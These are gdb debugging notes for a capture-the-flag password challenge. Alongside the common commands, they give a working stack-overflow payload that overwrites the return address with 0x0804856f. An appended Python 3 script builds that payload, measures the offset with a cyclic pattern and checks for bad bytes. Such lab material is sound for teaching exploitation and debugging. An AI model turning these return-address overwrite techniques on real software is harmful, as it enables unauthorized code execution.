Debugging Notes for Linux processes (gdb)
info reg
: display the register state.
info func
: list the functions in the program (from its symbols, so this is most useful on an unstripped binary).
disass functionname
: disassemble a function.
break *0x080484d4
: set a breakpoint at an interesting address. In this example the address is inside the “checkpass” function, which looked interesting. We then use r (run)
to let the program execute up to the breakpoint.
With info reg we can confirm that the instruction pointer (EIP) now holds the address configured in our breakpoint.
info break
: displays the breakpoints we have set.
del {breakpoint number from info break}
: to remove a breakpoint.
x/20w $esp
: display 20 words starting at the stack pointer.
x/32b $esp
: display 32 bytes starting at the stack pointer.
x/s 0x80488a6
: display string at the specified address.
In this example, I used x/i {address}
to see something interesting being moved into the EAX register in a function I'd found with info func
. Because the challenge is password related, this makes me wonder if the developer is moving the password into a register to compare it to the user input:
run < <(python -c 'print "A" * 612 + "\x6f\x85\x04\x08"')
: start the program with its standard input taken from the output of the python command. (Important to note there is a space between the two < characters: the first < is input redirection, <( ... ) is bash process substitution.) The input is 612 bytes of padding followed by the address 0x0804856f written in little-endian byte order. The print statement is Python 2 syntax; in Python 3 raw bytes have to be written with sys.stdout.buffer.write.
Note that in this case this is the eventual answer to the debug challenge: the overflow overwrites the return address and redirects execution to the access-granted function that displays the password (the flag is {dropbear}).
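Worked example, added here and not part of the original notes: a Python 3 script that builds the input the run < <(...) line feeds to the program, and goes one step further than the notes by measuring the 612-byte offset with a cyclic pattern (crash the program with the pattern, read EIP from info reg, look those four bytes up) instead of guessing it. The offset and the 0x0804856f address are the ones from the notes' example; the pattern layout, the helper names and the bad-byte check are assumptions made for illustration.

```python
# Added example, not part of the original notes: builds the overflow input that the
# notes pipe into gdb's `run`, and derives the padding length from a cyclic pattern
# instead of guessing it. Offset (612) and target address (0x0804856f) come from the
# notes' example; the pattern layout and helper names are constructed for illustration.
import string
import struct
import sys

# Values from the notes' example.
OFFSET = 612
TARGET = 0x0804856F  # address of the "access granted" function in the notes


def cyclic_pattern(length):
    """Return `length` bytes of a Metasploit-style pattern (Upper, lower, digit
    triplets). Every 4-byte window is unique, so the value that lands in EIP
    after the crash identifies the exact position of those bytes in the input."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern supports at most 20280 bytes")


def find_offset(pattern, eip_value):
    """Given the EIP value that gdb's `info reg` shows after the crash (as an int),
    return the offset of those four bytes in the pattern, or -1 if not present.
    The value is packed little-endian because that is how x86 loaded it."""
    return pattern.find(struct.pack("<I", eip_value))


def build_payload(offset, target, filler=b"A"):
    """Padding up to the saved return address, then the target address in
    little-endian byte order (the "\\x6f\\x85\\x04\\x08" in the notes)."""
    return filler * offset + struct.pack("<I", target)


def bad_bytes(payload, forbidden=b"\x00\x0a"):
    """Byte values that would cut the input short before it reaches the return
    address: NUL for strcpy-style copies, newline for gets/fgets. Returns the
    set of offending byte values found in the payload (empty means it is clean)."""
    return {b for b in payload if b in forbidden}


if __name__ == "__main__":
    # Stage 1: crash the program with the pattern and read EIP from `info reg`:
    #   run < <(python3 this_script.py pattern)
    # Stage 2: emit the real payload:
    #   run < <(python3 this_script.py)
    # Raw bytes must go through sys.stdout.buffer; print() would re-encode them.
    if len(sys.argv) > 1 and sys.argv[1] == "pattern":
        sys.stdout.buffer.write(cyclic_pattern(700))
    else:
        payload = build_payload(OFFSET, TARGET)
        if bad_bytes(payload):
            sys.exit("target address contains a byte that truncates the input")
        sys.stdout.buffer.write(payload)
```

Usage: run the program under gdb with the pattern first; if info reg then shows, for instance, eip 0x41347541, find_offset(cyclic_pattern(700), 0x41347541) returns 612, which is the padding length the notes arrived at. The bad-byte check is the caveat that matters most in practice: 0x0804856f contains neither 0x00 nor 0x0a, but an address that did would be cut off by gets/strcpy before it ever reached the saved return address.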
Some other misc commands:
print $esp
: print a register of your choosing.
print system
: print the address of libc's system() function (only resolvable once the program is running and libc has been loaded).
set disassembly-flavor intel
: change to Intel syntax (the usual syntax in Windows tooling).
set disassembly-flavor att
: change back to AT&T syntax (gdb's default and the usual syntax on Linux).